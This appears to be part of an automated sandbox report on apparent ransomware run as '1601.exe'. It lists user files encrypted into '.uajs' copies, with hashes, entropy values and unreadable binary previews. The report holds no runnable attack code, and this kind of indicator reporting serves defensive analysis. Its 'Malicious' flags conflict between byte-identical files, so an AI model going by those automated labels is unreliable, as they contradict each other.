SHA-256:	2A6F68BDAB7AC42A7B5F9F0191D2F107AEEC118035D8AA829FF333CAD94AA42B
SHA-512:	C33BF196F2DCC67B6C79FD5AAB0605A6E37E9AB9100CB3016A43FCC3DCFAE12999D54B813FDA6A804E083B688850B57F37EFEE6C07359652C0E297853A25AF3A
Malicious:	false
Preview:	EWZCV."..r.O.fX.~.sS_:.F......-Iz.....qB..W.....\|`.....9.X.k.1......nCm..Z;6.a..e....b/..Z.cR.........^m..N/..}..._.\.Z.lw'Z...K.@.......)o....^...(.Y..?x./w.f..L.IL.....?....=.'<j.....-3.....l....... A.U.G.+.P.O4...W6.6YS..O...K.E.....9....>.L\/...i..5B...w...HGe.M,..`.2...s....}.^.?.W7...Y.........Kl.c....M{n...&:.j8...q.=X.W..m{.\|..'[A..}(..KZxw.....X.."..-.7:..S5..H.9......g..[...b..#h.....+...)W."P...o.m.f.Zl...h{...F.omS...F..x...\|..I.q.r^u....)C.+..H.U._.0...3.X'....P...D.)...<.D..../$.zw&...v.1.....k...7J...........-;...1...x.Bj..^...1.C.Qi(..)...p..u%....t....^............r...p..o...x.q[(.+.T...@..".Q....)...;..$'.).6/.d....2.6)7$........<.....j..F..........%......d.6....qe(pe.=<...!_c...A..o..o}..'/........h"%^0!tyz.5.F\|......~.....^..T^.?.1..J..%d}[p2..Xq.5t....3.l..MH.evZ....?s.pL...@7...zb.b.+`.G..Z]wuq..f..5....=v..6.7E"j.E..{.>7.@.mk(l...r.\|-.....7X\|&...V..z.j.........C...Vr...z.#..u.B..;.....g..T...c..{J......4e)..{..e.R

C:\Users\user\Desktop\PALRGUCVEH\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854732053665291
Encrypted:	false
SSDEEP:	24:JkuWsef90p+26Le8AncvYQIh1DUEOcio3nh9iYpq8JxcSt3+ZVqswcGNStv2VtOe:JvHd18An3QIh1QEOcfh9HFcO3+ROAtvo
MD5:	CA29EAAF86A17AC24B4F766F07E5C2DD
SHA1:	8ADAD35E29932D786C6478BF8B6840418152F306
SHA-256:	BE05AE80CCB3782E025E85B5446B8891B925D0019E9B74866670A4BD35C5C4A0
SHA-512:	0BBDE24A1ABD58AC7C850330A53935A08FFF233B2A5E46AC0484B96A2070DC8BEF81F3648F3D9A0D18468A05D42E57A0AFDAEA10106B836857C1674BC6A74E05
Malicious:	true
Preview:	PALRG.n .....".2Fw-02..)....o.\.X.[b>..y+.<n3......P.mP.J...\...9...m.^]......^T...B.J..4r....7N.~.BZp..Z.&D...4I0.h..Q........iCG........0.P>.._..?.}pY..C.7n..GX{..KJ.i.p.:.oa.?Y...\|..I....G.g.B...w.?O.y-u..5..\|..U].{p2H^...9...4FXcKQKdY...(.$..7..}Zg.....g.c...46...D1..c...s.S.B a+q.:+......Zs.[..Vu..+9.".[.....=Q.y..-+.tW.:."y.}.QT....G.;........_../.?.\|AGY...........Qm.GT.c.]..z....F.......E%....2..DK2.k@.,C...k.........^...:..A....J.P:]........U..E.`.8.J..f.B^}R.q.&..\|..5Zx..vo.x.Yf:.a....k.6Vq..tM.M....}..p..<cI..U..z/...Ns9...........<....L......F;.5....@.....[v.WYb..l.r.....\|.`.F!L.T*........5..{.5..%"..t\QM.K.A\A..g0T..G.....az.....h... ..v..G......>.s..HG"0.....4Q.^F...ax.S.&..$.....}Miy.u..!..%)..."vH...`........XD\|....G...]... ..F.j.mk~^..w......8{e/../#?.S...vX~......1...@?g..~E&t....../..v...!.#..3......2LNN#..P....y.!n#.w.'..O.W....X'.....)-..2..J....C..8.9.\|...B.,....P.g.K.....l...h....N..7d..[C..\|..1.~?..l.3C5..8......("H[.....Y.l2

C:\Users\user\Desktop\PALRGUCVEH\PALRGUCVEH.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854732053665291
Encrypted:	false
SSDEEP:	24:JkuWsef90p+26Le8AncvYQIh1DUEOcio3nh9iYpq8JxcSt3+ZVqswcGNStv2VtOe:JvHd18An3QIh1QEOcfh9HFcO3+ROAtvo
MD5:	CA29EAAF86A17AC24B4F766F07E5C2DD
SHA1:	8ADAD35E29932D786C6478BF8B6840418152F306
SHA-256:	BE05AE80CCB3782E025E85B5446B8891B925D0019E9B74866670A4BD35C5C4A0
SHA-512:	0BBDE24A1ABD58AC7C850330A53935A08FFF233B2A5E46AC0484B96A2070DC8BEF81F3648F3D9A0D18468A05D42E57A0AFDAEA10106B836857C1674BC6A74E05
Malicious:	false
Preview:	PALRG.n .....".2Fw-02..)....o.\.X.[b>..y+.<n3......P.mP.J...\...9...m.^]......^T...B.J..4r....7N.~.BZp..Z.&D...4I0.h..Q........iCG........0.P>.._..?.}pY..C.7n..GX{..KJ.i.p.:.oa.?Y...\|..I....G.g.B...w.?O.y-u..5..\|..U].{p2H^...9...4FXcKQKdY...(.$..7..}Zg.....g.c...46...D1..c...s.S.B a+q.:+......Zs.[..Vu..+9.".[.....=Q.y..-+.tW.:."y.}.QT....G.;........_../.?.\|AGY...........Qm.GT.c.]..z....F.......E%....2..DK2.k@.,C...k.........^...:..A....J.P:]........U..E.`.8.J..f.B^}R.q.&..\|..5Zx..vo.x.Yf:.a....k.6Vq..tM.M....}..p..<cI..U..z/...Ns9...........<....L......F;.5....@.....[v.WYb..l.r.....\|.`.F!L.T*........5..{.5..%"..t\QM.K.A\A..g0T..G.....az.....h... ..v..G......>.s..HG"0.....4Q.^F...ax.S.&..$.....}Miy.u..!..%)..."vH...`........XD\|....G...]... ..F.j.mk~^..w......8{e/../#?.S...vX~......1...@?g..~E&t....../..v...!.#..3......2LNN#..P....y.!n#.w.'..O.W....X'.....)-..2..J....C..8.9.\|...B.,....P.g.K.....l...h....N..7d..[C..\|..1.~?..l.3C5..8......("H[.....Y.l2

C:\Users\user\Desktop\PALRGUCVEH\ZGGKNSUKOP.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865762889337026
Encrypted:	false
SSDEEP:	24:7gf0UxbbUt4O9izKzb+sDiM0XHkjTevfY0f5JzO2gaDtRosVlYdw1bD:evaGzu+sDiM00PevfPbO2BDtmm8yD
MD5:	E63011C83E8A535135F2761A80B2FEC6
SHA1:	0700D87FD3C67DE824E3ABD21B801393EAAFD4F6
SHA-256:	3F6C5BCE383145F4D4DBE1B1B5FCFF19A15074A6D8E787DE41446A5E2EB6117F
SHA-512:	2347372888A8CED08F8CC04D4178D319C7648909A398677D8AC740D07B817927A87B988CE0F4285548A073313F5E62B7A2D52C8B503ACF84CB21AC9B7CB6EEDB
Malicious:	false
Preview:	ZGGKN.p.-.7.S..e.=.P.u."..O.../.../0...0ZX.......]:...R..n...!.......S.Xcw..\|...D@...6.W4....q4...=.......n...\...v;.T...'C....\...V.'..B.:e...3PtH+i~....:U.....x.t.+.<.C...)....0!B..J...z.8.!h....\.....Nh...z.f....F.k.S...vY..........`].Z...W._'V./p.g.Bq{ .....<u........e...,.sR......$...t!..x...K....=-'.....T.. .B.~..w..JJ....Q^"u.w...n.hy.!:.L.'....3+.g:.._.,.)\r%..q_..............:h......x..u......`7./~...Q...(h..N..!bG0.....LYt.Vv...UG...X%.....R@..z..&.....}9:...l6B{.....{.r..-U>.y..z.........-?A...mld'L..&(YQ......`.'...0nbU...<..3. /..y=qZ..C.bE.........=.s.u...O.5.~Zy(b.L.>z......h}/.W^..D...,`...a..jo.C...h.....v..G#2o...y..#Z..z2x..!..e...s.<....h.fk.o...b..k......)..=..K[d....F.{.......l..K.<....d...\|....#sN.....Ut...f.i.S..\|%..?f/_@...7h..H.m....,uq..Q...:..S..1..>Xu..'......6...G\|...<.8[.....u.L.:.....6..S...\|T..........T...Z.5.'M......n.+.<..*....V8....K.P.K..u.9[^.:....f....2.\..3....wr..GK..w.}.?.....j9i

C:\Users\user\Desktop\PALRGUCVEH\ZGGKNSUKOP.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865762889337026
Encrypted:	false
SSDEEP:	24:7gf0UxbbUt4O9izKzb+sDiM0XHkjTevfY0f5JzO2gaDtRosVlYdw1bD:evaGzu+sDiM00PevfPbO2BDtmm8yD
MD5:	E63011C83E8A535135F2761A80B2FEC6
SHA1:	0700D87FD3C67DE824E3ABD21B801393EAAFD4F6
SHA-256:	3F6C5BCE383145F4D4DBE1B1B5FCFF19A15074A6D8E787DE41446A5E2EB6117F
SHA-512:	2347372888A8CED08F8CC04D4178D319C7648909A398677D8AC740D07B817927A87B988CE0F4285548A073313F5E62B7A2D52C8B503ACF84CB21AC9B7CB6EEDB
Malicious:	false
Preview:	ZGGKN.p.-.7.S..e.=.P.u."..O.../.../0...0ZX.......]:...R..n...!.......S.Xcw..\|...D@...6.W4....q4...=.......n...\...v;.T...'C....\...V.'..B.:e...3PtH+i~....:U.....x.t.+.<.C...)....0!B..J...z.8.!h....\.....Nh...z.f....F.k.S...vY..........`].Z...W._'V./p.g.Bq{ .....<u........e...,.sR......$...t!..x...K....=-'.....T.. .B.~..w..JJ....Q^"u.w...n.hy.!:.L.'....3+.g:.._.,.)\r%..q_..............:h......x..u......`7./~...Q...(h..N..!bG0.....LYt.Vv...UG...X%.....R@..z..&.....}9:...l6B{.....{.r..-U>.y..z.........-?A...mld'L..&(YQ......`.'...0nbU...<..3. /..y=qZ..C.bE.........=.s.u...O.5.~Zy(b.L.>z......h}/.W^..D...,`...a..jo.C...h.....v..G#2o...y..#Z..z2x..!..e...s.<....h.fk.o...b..k......)..=..K[d....F.{.......l..K.<....d...\|....#sN.....Ut...f.i.S..\|%..?f/_@...7h..H.m....,uq..Q...:..S..1..>Xu..'......6...G\|...<.8[.....u.L.:.....6..S...\|T..........T...Z.5.'M......n.+.<..*....V8....K.P.K..u.9[^.:....f....2.\..3....wr..GK..w.}.?.....j9i

C:\Users\user\Desktop\QCOILOQIKC.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838783711509655
Encrypted:	false
SSDEEP:	24:mRc+kyS+x/T9yHmeDKvOHNbjUo0ND958Z021RXHSrEPtyB/XxRkFv1Il3RxX2w1X:Uc4S+DyNxgoQ9wL1RrtyBZRc03RxX2yD
MD5:	CA5DF50497D226E192E6224BA016E1A9
SHA1:	6DA39BBB36FAFCEA5C05432E225EF6CC35511223
SHA-256:	68C1B3631D7CF78F07784F3DCD02B37137FAB0F51DF76C92EA060C39C3246E77
SHA-512:	D39B6EBF15B6B5214E05D0A10DA16BCF8667982C98509C0E8C6406540FF85FA74626655EF048E04B5244F356E725F67EA4F06617078F4EF5B490B2868D43BABD
Malicious:	false
Preview:	QCOIL.....R.Y..^...(..KG5.{....B;T&-...&...S.....N..&i..Z.w...UMST..Vl....I.;....r?.T..J.P?.D.1:.i:.B0.F4$?......Zg...N......?.~.57gx..........M..9....{.......4AJ...!5.f..OJ..Y....lv.B...HS..e.yp..q.....:...;:...N....n)$....G].\|....W....3...O.M.$...nY..3....`..P.I./........r..G..)0E...6..\B?......k!2/....5a{.H...Ur..cJS..\.5...u.n..Su...l....~...^..R1...1.T-...(...Fe2.\|....[.&.......~.>) y.N.c?..w......ad.~...{..........m`..a.V.[..~..%/e....eH.!.R.../?S...D`AKC4.C_q...N5]!Z..T.lZ...P..ES.0...%.q...4.........-......Y.E..s........6..k....q.....Seo.z..,...)....e.e.c.Yi.-.^.:..25...[....M.....&...c..Af.e2.D..M.`.w..&f..k...[...z.!.;FdiO3.oP[.....&.9......&..CH..8.w...\..#1(.O{.K..=.G.[......J..{.^.0._....../{}.V7........@ts..iFI...z{...6....#6...>...2."...zPy.=.Fs!..Q.........\|D.jj..\|j..cg..e......R..]W...U..9..]..&.}&.....p(...b.7*.G.....].b.].{.......y/...^...A....Y/.x.~{..>.....Ji..........6..s..5h.6..._..(;NH.V..H..YK^E..!.{V".T.v

C:\Users\user\Desktop\QCOILOQIKC.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838783711509655
Encrypted:	false
SSDEEP:	24:mRc+kyS+x/T9yHmeDKvOHNbjUo0ND958Z021RXHSrEPtyB/XxRkFv1Il3RxX2w1X:Uc4S+DyNxgoQ9wL1RrtyBZRc03RxX2yD
MD5:	CA5DF50497D226E192E6224BA016E1A9
SHA1:	6DA39BBB36FAFCEA5C05432E225EF6CC35511223
SHA-256:	68C1B3631D7CF78F07784F3DCD02B37137FAB0F51DF76C92EA060C39C3246E77
SHA-512:	D39B6EBF15B6B5214E05D0A10DA16BCF8667982C98509C0E8C6406540FF85FA74626655EF048E04B5244F356E725F67EA4F06617078F4EF5B490B2868D43BABD
Malicious:	false
Preview:	QCOIL.....R.Y..^...(..KG5.{....B;T&-...&...S.....N..&i..Z.w...UMST..Vl....I.;....r?.T..J.P?.D.1:.i:.B0.F4$?......Zg...N......?.~.57gx..........M..9....{.......4AJ...!5.f..OJ..Y....lv.B...HS..e.yp..q.....:...;:...N....n)$....G].\|....W....3...O.M.$...nY..3....`..P.I./........r..G..)0E...6..\B?......k!2/....5a{.H...Ur..cJS..\.5...u.n..Su...l....~...^..R1...1.T-...(...Fe2.\|....[.&.......~.>) y.N.c?..w......ad.~...{..........m`..a.V.[..~..%/e....eH.!.R.../?S...D`AKC4.C_q...N5]!Z..T.lZ...P..ES.0...%.q...4.........-......Y.E..s........6..k....q.....Seo.z..,...)....e.e.c.Yi.-.^.:..25...[....M.....&...c..Af.e2.D..M.`.w..&f..k...[...z.!.;FdiO3.oP[.....&.9......&..CH..8.w...\..#1(.O{.K..=.G.[......J..{.^.0._....../{}.V7........@ts..iFI...z{...6....#6...>...2."...zPy.=.Fs!..Q.........\|D.jj..\|j..cg..e......R..]W...U..9..]..&.}&.....p(...b.7*.G.....].b.].{.......y/...^...A....Y/.x.~{..>.....Ji..........6..s..5h.6..._..(;NH.V..H..YK^E..!.{V".T.v

C:\Users\user\Desktop\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836168081132653
Encrypted:	false
SSDEEP:	24:tv6a1xSAuGAvjymtRQbD8ix9vhImKiaExAvaAcHvqIcC7n5rLqSnMNALdtIBxZwd:tvH1wARAukQP8IDWWAiAuvqIcqruSMNk
MD5:	80AA76D83DF9D08B85FCF90AF812E95C
SHA1:	91B4266CEF196B5319C50BABFBE70B341C307CE0
SHA-256:	D304A57BF4197CC7E93C42AF7DC6835546FBE991E729052F544D27F9746043D4
SHA-512:	BD6625FE546370748BCB8F8792182191B681A977F2A53844AEE346BDCC3903DB36CCCB22EF0F89297BADD7F1693F17065E3775291C92F8CAAC5412B1DCD93FB1
Malicious:	false
Preview:	TQDFJ...&Sy....B......f..wT.h)e....S...QrJ..c..~..y..Q...lZ!rp.N.\..3.6....'...3 W.Y...n....z....1TjMP..\.."..U..t....]...G.G.G..J.....V._.J.Q;.^....3.;.]...p..@.M.W.....W %K...(VZ.>P.c..<.W...3...2....).....i....<...A...;o.x"p.....hV..P..CK.;.?.....7....6.....$.'TQ.`.o..y\9...R....ZI..W...+...9....P.n}..7f...@.G.h5]\l..C..>..K.v."%_.e.xE..2.R{....5Qu4.......V:+..^3_..".Aq....ga.".G....F...T..2.`l...U;[.....M.v."..D..N.M.0-..). .....\..."B=y...`.bh.6.K...nV.KJ.<.:.."".1...].".Y..Y.....9...=$j..A.l..\{_....Hk..w.:..u.E./ YO.Sr.E^;...S..zj.....+.b....."..&R..6......;:.......&.........v.<T.qg...Q.hqWl..&k......F....}..{Q4P.._.T...H..u...}.I...3.*X..(...i..:..'{.\.$`..uiIh..H.... d.L.k...h.....:...4..g.....=3.....g....X...Pp1]r.s.........g...n1,..%..'..CJ..f. x[]...4C>.Da...5n...[.c..nj./eQfH.o1.G"..(...M...q&.n..0...G.j.n].F...q...)....c.....9.{W...........j..u+9R.Bd...=.'}.....P..b.j..).tF..Q....e...!....!.U.o.h^4..]b~.B......... lG.....=p

C:\Users\user\Desktop\TQDFJHPUIU.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836168081132653
Encrypted:	false
SSDEEP:	24:tv6a1xSAuGAvjymtRQbD8ix9vhImKiaExAvaAcHvqIcC7n5rLqSnMNALdtIBxZwd:tvH1wARAukQP8IDWWAiAuvqIcqruSMNk
MD5:	80AA76D83DF9D08B85FCF90AF812E95C
SHA1:	91B4266CEF196B5319C50BABFBE70B341C307CE0
SHA-256:	D304A57BF4197CC7E93C42AF7DC6835546FBE991E729052F544D27F9746043D4
SHA-512:	BD6625FE546370748BCB8F8792182191B681A977F2A53844AEE346BDCC3903DB36CCCB22EF0F89297BADD7F1693F17065E3775291C92F8CAAC5412B1DCD93FB1
Malicious:	false
Preview:	TQDFJ...&Sy....B......f..wT.h)e....S...QrJ..c..~..y..Q...lZ!rp.N.\..3.6....'...3 W.Y...n....z....1TjMP..\.."..U..t....]...G.G.G..J.....V._.J.Q;.^....3.;.]...p..@.M.W.....W %K...(VZ.>P.c..<.W...3...2....).....i....<...A...;o.x"p.....hV..P..CK.;.?.....7....6.....$.'TQ.`.o..y\9...R....ZI..W...+...9....P.n}..7f...@.G.h5]\l..C..>..K.v."%_.e.xE..2.R{....5Qu4.......V:+..^3_..".Aq....ga.".G....F...T..2.`l...U;[.....M.v."..D..N.M.0-..). .....\..."B=y...`.bh.6.K...nV.KJ.<.:.."".1...].".Y..Y.....9...=$j..A.l..\{_....Hk..w.:..u.E./ YO.Sr.E^;...S..zj.....+.b....."..&R..6......;:.......&.........v.<T.qg...Q.hqWl..&k......F....}..{Q4P.._.T...H..u...}.I...3.*X..(...i..:..'{.\.$`..uiIh..H.... d.L.k...h.....:...4..g.....=3.....g....X...Pp1]r.s.........g...n1,..%..'..CJ..f. x[]...4C>.Da...5n...[.c..nj./eQfH.o1.G"..(...M...q&.n..0...G.j.n].F...q...)....c.....9.{W...........j..u+9R.Bd...=.'}.....P..b.j..).tF..Q....e...!....!.U.o.h^4..]b~.B......... lG.....=p

C:\Users\user\Desktop\ZGGKNSUKOP.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860519352589704
Encrypted:	false
SSDEEP:	24:dEZzKqsQlFXmYCkG+l6Zsiul1TavTb1dchGrsYzxGAbkFBgy4qqw1bD:dQ+qPCiQivTavP1dchuzCB5qyD
MD5:	70756257C78960F9DB5EFD0FBD92C1D7
SHA1:	E36D85C3B7948D151C8C848194EAE32D9FDB0690
SHA-256:	CF60E11DEABED676CCB3C7380CFA2C06B5450D3FAFD66EF5EE667C9EB8A82BF5
SHA-512:	2382340A386A2AD41994B3033924EA406961263181CB3AF4290C1252C4BC472C07E6604043AC361D90A30894680B0C7DFDE3FEA592D0EFDF9AB79FCE35CB07A8
Malicious:	false
Preview:	ZGGKNM..O.&...9.....D.{p...........i..%l.4i.z.O.....`}.+.)R0....Xx+.S....!..2.4vk%.w-._...\....xyvum....J.....T..l.3IN....t.b.iO.o b.. m....,./.s.Zd..pW.....&#R.OW....U.S....m).$hkR...j)L...D....q..).0iyA....g.#.Lm.6PR........Oq8...,.42A1;w.`i...0hf.. ..3Z2.l.._1&.{........R..........f..........W..U..Y..5Z....'.,.......cw.."........x....8....R.........4/7....."...;4.!..VhY.....5..cM)..t.......PH!.0...t.b..&....N..}..C\|e.6..=b.`^U...........(.d'.,...omc7c.3,..X...5xV.....>.y....P..~..B.x.33.`..\4..A`.!..U......Q.B\|....t.W.g...S.....9.....t..F?S.....Nt.. ...../<....../..Q./C.@.z.k..Z...M.....>RBc$..[..Ew.=....\|Y.v..T.2..a.(..+....\..s..y.K.mq....{{_g.w.....@].\|.b.'...A;N.....E]....q;SN..L......;.i.p.=..eTY..T....B]....(6..!..U..\|.Jh..v..[.......\|n...D.nX..6q....?T.i...@5..`v.m..%8.aa.IX^...VV..U8....~....O.."=.....!{..Lr..a..U.....,..uO8......;n$u.Ff..l/FP0k.._9.y..Vg.q.w..ffW.M,5...y.?.h....7......I.'...1...9....@..D......p.

C:\Users\user\Desktop\ZGGKNSUKOP.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860519352589704
Encrypted:	false
SSDEEP:	24:dEZzKqsQlFXmYCkG+l6Zsiul1TavTb1dchGrsYzxGAbkFBgy4qqw1bD:dQ+qPCiQivTavP1dchuzCB5qyD
MD5:	70756257C78960F9DB5EFD0FBD92C1D7
SHA1:	E36D85C3B7948D151C8C848194EAE32D9FDB0690
SHA-256:	CF60E11DEABED676CCB3C7380CFA2C06B5450D3FAFD66EF5EE667C9EB8A82BF5
SHA-512:	2382340A386A2AD41994B3033924EA406961263181CB3AF4290C1252C4BC472C07E6604043AC361D90A30894680B0C7DFDE3FEA592D0EFDF9AB79FCE35CB07A8
Malicious:	false
Preview:	ZGGKNM..O.&...9.....D.{p...........i..%l.4i.z.O.....`}.+.)R0....Xx+.S....!..2.4vk%.w-._...\....xyvum....J.....T..l.3IN....t.b.iO.o b.. m....,./.s.Zd..pW.....&#R.OW....U.S....m).$hkR...j)L...D....q..).0iyA....g.#.Lm.6PR........Oq8...,.42A1;w.`i...0hf.. ..3Z2.l.._1&.{........R..........f..........W..U..Y..5Z....'.,.......cw.."........x....8....R.........4/7....."...;4.!..VhY.....5..cM)..t.......PH!.0...t.b..&....N..}..C\|e.6..=b.`^U...........(.d'.,...omc7c.3,..X...5xV.....>.y....P..~..B.x.33.`..\4..A`.!..U......Q.B\|....t.W.g...S.....9.....t..F?S.....Nt.. ...../<....../..Q./C.@.z.k..Z...M.....>RBc$..[..Ew.=....\|Y.v..T.2..a.(..+....\..s..y.K.mq....{{_g.w.....@].\|.b.'...A;N.....E]....q;SN..L......;.i.p.=..eTY..T....B]....(6..!..U..\|.Jh..v..[.......\|n...D.nX..6q....?T.i...@5..`v.m..%8.aa.IX^...VV..U8....~....O.."=.....!{..Lr..a..U.....,..uO8......;n$u.Ff..l/FP0k.._9.y..Vg.q.w..ffW.M,5...y.?.h....7......I.'...1...9....@..D......p.

C:\Users\user\Desktop\ZIPXYXWIOY.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8206773808194106
Encrypted:	false
SSDEEP:	24:5tAOy/G/bdYlC2A/V0e+s6ohzKS8FwFws5dfPzrJa8VmeRkzth7G8w1bD:wgbdIzAN0e4ohCFw+a5Ppah6S48yD
MD5:	E3A6683F38646433C3B3E34E56EE0B21
SHA1:	25DCCEC4C422B881E6B2A9F0EBB2C94D741ED019
SHA-256:	6FC99AD4AEB94D6B36B239F0F48DF1F55589532E22325154B0970BE25A592962
SHA-512:	E8A3F4C373EBC70BEE1405EFE092216078BD1C7ADCD4226DB3956AA5140C4A6A397A3A68F5A76A5BEAEE6DE7D3DC19BD8B767E5CFDE728913890D0682086E5E2
Malicious:	true
Preview:	ZIPXY.C.....f~.6..f0.0..l..bB.U{Y.....h.%.p...l..]x.c.^...E6.#....D..omfY.&~.l.g$\...1..`...[.i..7..k.S...'...?.At.7z...<......HGXz.f7.\|....PT....\>,......N...`._.Hk....E...5.e.=.OT..3......H..zKp.s...Yt.-4.......Z.4...r.....q..sR.....1.o\|...Y..a....`.....@.]..{X`...3+.....L..V.&9......Nf....[...$.0.}3c....F.p.(..A......rG.,..7]...:.]...u.4..;..X...-....?.B.^..........v/..j..w.tV...A.7.a..G...!q!...4..)P..g....gE.h.LQ......hi.V.`no.:koC.....rM.u.M;.V...[X..[?.:.Y.lx.2..p.....]&@..../.>..n\|te.........n.l.......O.y.....8df.I.............X..D k.Y+gx..p..j..d.^.uo.fy.b-\|.....a.0'.@'.]J<n....c.<.7.}G....$r.Y.1......Z.H.)g..23V.:..iH$.I....H...\..E..*.3..A...4...\|..U.z]...l..w...{.b...~.....y....s..&.f; $..+&...}...r..\|...\|G..^w..4..3.^.K..p.[6...7..u./.l.9.A..$M...k..3..K~.<W....+......`4J....V..zQ..-..^..SO;j.\q,..k.2.#e..0..._..n:.>..3......^.@...bF.T...............i.Z..).Th....e'. h..j..(....\Km.....0 ......=I ..B(p).>-I...KO^H..x...

C:\Users\user\Desktop\ZIPXYXWIOY.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8206773808194106
Encrypted:	false
SSDEEP:	24:5tAOy/G/bdYlC2A/V0e+s6ohzKS8FwFws5dfPzrJa8VmeRkzth7G8w1bD:wgbdIzAN0e4ohCFw+a5Ppah6S48yD
MD5:	E3A6683F38646433C3B3E34E56EE0B21
SHA1:	25DCCEC4C422B881E6B2A9F0EBB2C94D741ED019
SHA-256:	6FC99AD4AEB94D6B36B239F0F48DF1F55589532E22325154B0970BE25A592962
SHA-512:	E8A3F4C373EBC70BEE1405EFE092216078BD1C7ADCD4226DB3956AA5140C4A6A397A3A68F5A76A5BEAEE6DE7D3DC19BD8B767E5CFDE728913890D0682086E5E2
Malicious:	false
Preview:	ZIPXY.C.....f~.6..f0.0..l..bB.U{Y.....h.%.p...l..]x.c.^...E6.#....D..omfY.&~.l.g$\...1..`...[.i..7..k.S...'...?.At.7z...<......HGXz.f7.\|....PT....\>,......N...`._.Hk....E...5.e.=.OT..3......H..zKp.s...Yt.-4.......Z.4...r.....q..sR.....1.o\|...Y..a....`.....@.]..{X`...3+.....L..V.&9......Nf....[...$.0.}3c....F.p.(..A......rG.,..7]...:.]...u.4..;..X...-....?.B.^..........v/..j..w.tV...A.7.a..G...!q!...4..)P..g....gE.h.LQ......hi.V.`no.:koC.....rM.u.M;.V...[X..[?.:.Y.lx.2..p.....]&@..../.>..n\|te.........n.l.......O.y.....8df.I.............X..D k.Y+gx..p..j..d.^.uo.fy.b-\|.....a.0'.@'.]J<n....c.<.7.}G....$r.Y.1......Z.H.)g..23V.:..iH$.I....H...\..E..*.3..A...4...\|..U.z]...l..w...{.b...~.....y....s..&.f; $..+&...}...r..\|...\|G..^w..4..3.^.K..p.[6...7..u./.l.9.A..$M...k..3..K~.<W....+......`4J....V..zQ..-..^..SO;j.\q,..k.2.#e..0..._..n:.>..3......^.@...bF.T...............i.Z..).Th....e'. h..j..(....\Km.....0 ......=I ..B(p).>-I...KO^H..x...

C:\Users\user\Documents\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843519449222428
Encrypted:	false
SSDEEP:	24:vdTbXNAdI8uDKCO2ZTy87NDkhO7ckQ4TWWLFHpZHipQaw1bD:v9behz12ZTTNAhgXTWWLFHpViSayD
MD5:	290FCD0AE79F9DEB7BAAFE364CD87EF3
SHA1:	0E7F719129FAAA28FDFA65A18B61A18A3FA32633
SHA-256:	A1971138556BFFC2CEA7926395C990F9768BAFBA4EE75FF9338EEAD761742790
SHA-512:	3FFCD6B7CE18A8F884111E4F592941D6FE7629ECFE2DD75FEA52F265F699D7370F26C1E28D93DCF9198B813460AF0F572B6B496D390D53F4209F81F8E94C7556
Malicious:	false
Preview:	DUUDT.yXw..^....}..j.;.74/K.P..1..t.Q..."f....$'.1y.c.V`.P>b..M6.9$..7.2..9syp....B.Z....Y.>..........f;.7\|,q..y.i..9.....s...`.....H..UB.... Q..J..sR\..A....]...d5...NrQ.l...3..4G...sL...oJ.>.,.P......(.K.cJ(.Dd..k..h....8".m....n4.....SW.3.....4T.Q.9c.Z.R&...#.wb0,C...^&.L.08..>#.Hf.8....\f.ag..~s...]..l...wl...5..(.ifyW..h.=lc.3.R.lZ..G.Gc..O$.../m?....o.{Z....O@..._.Yi..lr....P.D,.....(...v...0.V....,..........Dl.1..q~.<&.a.7.......>.x&.9..C.'.\.K V..V.3.Q.....ZZ.\|...=.3g.[j.pE...{_.`.....j...qF..h..E............}L_....l0}...[G"...]...8^..gtJ..x,....X...s.XW.e;..`.a0..k.5$.....M.......8-..NC\}.....d. _.....7._...[.7.yd.~...`&r..R..&P.Q].v..=fT..OY.....-.5.....B..j.....i....s.X44f...y...>Z.I.[.A.R..m.8I.9`......e.............Zd......@.$.qrr...p.z..17a..P..n..X.\|...(#.S..yc..']i.s.G.....l!.v.BJ....j8p~.'ONKYRs.h.u.._....l...V....Eum..S..t.'..0..RF.t..#..r..........0....o..?.:0...&9..S-.DL..W....Q..a..a..._....../...O.]......G

C:\Users\user\Documents\DUUDTUBZFW.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843519449222428
Encrypted:	false
SSDEEP:	24:vdTbXNAdI8uDKCO2ZTy87NDkhO7ckQ4TWWLFHpZHipQaw1bD:v9behz12ZTTNAhgXTWWLFHpViSayD
MD5:	290FCD0AE79F9DEB7BAAFE364CD87EF3
SHA1:	0E7F719129FAAA28FDFA65A18B61A18A3FA32633
SHA-256:	A1971138556BFFC2CEA7926395C990F9768BAFBA4EE75FF9338EEAD761742790
